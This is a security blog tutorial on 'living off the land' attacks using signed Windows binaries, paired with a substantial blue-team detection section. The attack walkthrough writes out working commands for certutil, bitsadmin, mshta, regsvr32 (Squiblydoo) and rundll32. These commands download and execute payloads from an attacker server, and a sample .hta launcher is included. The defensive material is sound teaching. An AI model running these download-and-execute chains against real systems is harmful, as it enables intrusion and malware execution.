Living off the Land: Abusing LOLBAS Binaries on Windows

Security
2026.03.25
Time it takes to read this article 5 minutes.

Introduction / Overview

Legal & ethical disclaimer. Everything below is provided for education and for authorized security testing only. Run these commands solely on systems you own or have explicit, written permission to test. Unauthorized use against systems you do not control is illegal in most jurisdictions and is not endorsed by the author.

"Living off the Land" (LotL) is the practice of accomplishing offensive objectives — download, execution, persistence, defense evasion — using binaries, scripts and libraries that ship with the operating system and are signed by Microsoft. The catalogued versions of these binaries are tracked by the community LOLBAS project (Living Off The Land Binaries, Scripts and Libraries).

The appeal is simple: a Microsoft-signed binary is trusted by default. Application allowlisting (WDAC, AppLocker) often permits it, EDR baselines treat it as benign, and there is no malware file on disk to scan. In this article you will learn how five of the most abused LOLBAS — certutil.exe, bitsadmin.exe, mshta.exe, regsvr32.exe and rundll32.exe — can be used to fetch and execute payloads, and how a blue team detects and breaks each technique.

How it works / Background

LOLBAS abuse relies on unintended functionality in legitimate tools. Each binary has a documented, benign primary purpose, but exposes a side-channel an attacker can repurpose:

Binary Intended purpose Abused for
certutil.exe Certificate / CA management File download, Base64 decode
bitsadmin.exe Background Intelligent Transfer Service jobs Stealthy file download, job persistence
mshta.exe Run HTML Applications (.hta) Execute inline VBScript/JScript, remote scriptlets
regsvr32.exe Register/unregister COM DLLs Run remote scriptlet via COM (the "Squiblydoo" technique)
rundll32.exe Call exported DLL functions Proxy execution of DLLs and JavaScript

Because the executing process is signed-by-microsoft.exe, the malicious behavior hides behind a trusted parent. These techniques map cleanly to MITRE ATT&CK T1218 — System Binary Proxy Execution (with sub-techniques T1218.010 regsvr32, T1218.011 rundll32, T1218.005 mshta) and T1105 — Ingress Tool Transfer.

Prerequisites / Lab setup

  • A Windows 10/11 or Server VM you control, ideally snapshotted.
  • A second host acting as the attacker / web server (Kali or any Linux).
  • Defender real-time protection can stay on — that is the point; you want to see what slips past and what gets caught.

Start a simple delivery server on the attacker host:

# Serve payloads over HTTP from the attacker box
python3 -m http.server 8080
Bash

Attack walkthrough / PoC

1. certutil — download and decode

certutil was designed to fetch CRLs and certificates, so it speaks HTTP. The -urlcache flag turns it into a downloader; -f forces overwrite and -split writes the body to disk.

# Download a payload to disk
certutil.exe -urlcache -split -f http://10.10.10.5:8080/payload.exe C:\Windows\Temp\p.exe

# certutil can also Base64-decode a staged blob (defeats naive content inspection)
certutil.exe -decode C:\Windows\Temp\enc.b64 C:\Windows\Temp\p.exe
PowerShell

Note: -urlcache leaves artifacts in the CryptnetUrlCache folder, which is itself a great forensic lead (covered below).

2. bitsadmin — transfer via the BITS service

BITS performs throttled, resumable transfers — the same mechanism Windows Update uses — so the network traffic blends in and the work is done by the svchost-hosted BITS service rather than your process.

bitsadmin /transfer job1 /download /priority normal ^
  http://10.10.10.5:8080/payload.exe C:\Windows\Temp\p.exe
PowerShell

The modern PowerShell equivalent is Start-BitsTransfer, which uses the same service:

Start-BitsTransfer -Source http://10.10.10.5:8080/payload.exe -Destination C:\Windows\Temp\p.exe
PowerShell

3. mshta — execute remote script with no payload on disk

mshta.exe runs HTML Applications, which can contain inline VBScript or JScript. It will fetch and run a remote .hta directly, so nothing malicious needs to touch disk.

mshta.exe http://10.10.10.5:8080/evil.hta
PowerShell

A minimal evil.hta that spawns a process:

<html><head><script language="VBScript">
  Set s = CreateObject("WScript.Shell")
  s.Run "calc.exe", 0, false
  window.close()
</script></head><body></body></html>
HTML

4. regsvr32 — "Squiblydoo" remote scriptlet

regsvr32 can register a COM object whose registration logic lives in a remote .sct scriptlet, fetched over HTTP/S, again with nothing written to disk. This classic is known as Squiblydoo.

regsvr32.exe /s /n /u /i:http://10.10.10.5:8080/evil.sct scrobj.dll
PowerShell

Flags: /s silent, /u unregister (triggers DllUnregisterServer → the scriptlet runs), /i passes the URL to the named object, and scrobj.dll is the Microsoft script COM runtime.

5. rundll32 — proxy DLL or JavaScript execution

rundll32 calls an exported function from a DLL. Attackers use it to run a malicious DLL's export, or to execute JavaScript via the javascript: moniker and mshtml.dll:

# Run an exported function from a (malicious) DLL
rundll32.exe C:\Windows\Temp\evil.dll,EntryPoint

# JavaScript proxy execution — no .dll dropped by you
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("calc.exe")
PowerShell

Chained together, a realistic intrusion looks like: certutil/bitsadmin pulls the stage, then mshta/regsvr32/rundll32 executes it under a trusted parent. Once code runs, an operator pivots to credential and privilege-escalation work — see Windows token impersonation and privilege escalation and, in AD environments, Kerberoasting.

Mermaid diagram

Living off the Land: Abusing LOLBAS Binaries on Windows diagram 1

Diagram: attacker-controlled content is fetched by a download LOLBin and run by an execution LOLBin, yielding code execution under a Microsoft-signed process that then escalates.

Detection & Defense (Blue Team)

LOLBAS abuse is detected through behavior and context, not file signatures. Defenders should weight detection at least as heavily as the offense.

1. Command-line and process-lineage telemetry. Enable command-line auditing (Audit Process Creation, Event ID 4688 with ProcessCommandLine) or Sysmon Event ID 1. Hunt for the tell-tale argument patterns:

  • certutil with -urlcache, -decode, -encode, or any http.
  • bitsadmin /transfer (and Sysmon-monitor BITS via the Microsoft-Windows-Bits-Client/Operational log, Event IDs 3/59/60).
  • regsvr32 with /i: and a URL, or scrobj.dll.
  • rundll32 with javascript:, vbscript:, or no DLL/ordinal at all.
  • mshta with an http/https URL or .hta argument.

2. Anomalous parent-child relationships. mshta.exe, regsvr32.exe or rundll32.exe spawning cmd.exe, powershell.exe or making outbound network connections is highly suspicious. Office apps (winword.exe, excel.exe) spawning any of these is a strong macro-delivery signal — Microsoft's Attack Surface Reduction (ASR) rules cover exactly this (e.g. Block Office applications from creating child processes and Block executable content from email/webmail).

# Example ASR rule: block Win32 API calls from Office macros
Add-MpPreference -AttackSurfaceReductionRules_Ids 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B `
  -AttackSurfaceReductionRules_Actions Enabled
PowerShell

3. Network egress controls. These techniques require outbound HTTP/S to attacker infrastructure. A forward proxy that restricts which processes may reach the internet, TLS inspection, and alerting on certutil/bitsadmin user-agents (Microsoft-Delivery-Optimization, Microsoft BITS) catch the download stage.

4. Forensic artifacts. certutil -urlcache writes to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE and the CryptnetUrlCache directories — a reliable retrospective indicator. BITS jobs persist in %ALLUSERSPROFILE%\Microsoft\Network\Downloader\qmgr*.dat.

5. Allowlisting that constrains LOLBins. WDAC / AppLocker cannot easily ban a signed system binary outright, but you can:

  • Block mshta.exe and bitsadmin.exe entirely if your environment does not need them (deprecated by Microsoft).
  • Use AppLocker DLL rules and script rules to limit regsvr32/rundll32 from loading non-approved content.
  • Deploy WDAC in enforced mode so even signed binaries cannot load unsigned/remote script payloads.

6. Disable script COM where feasible. Removing or restricting the Windows Script Host and blocking scrobj.dll execution breaks Squiblydoo and many mshta/JScript chains.

Conclusion

LOLBAS techniques succeed precisely because the binaries are legitimate and trusted. certutil and bitsadmin pull the payload; mshta, regsvr32 and rundll32 execute it under a Microsoft signature — often with nothing malicious written to disk. For red teamers, these remain reliable, low-noise primitives. For defenders, the answer is not signature scanning but command-line auditing, process-lineage analytics, ASR rules, egress control and WDAC enforcement. Detect the behavior, not the file.

References

Comments

Copied title and URL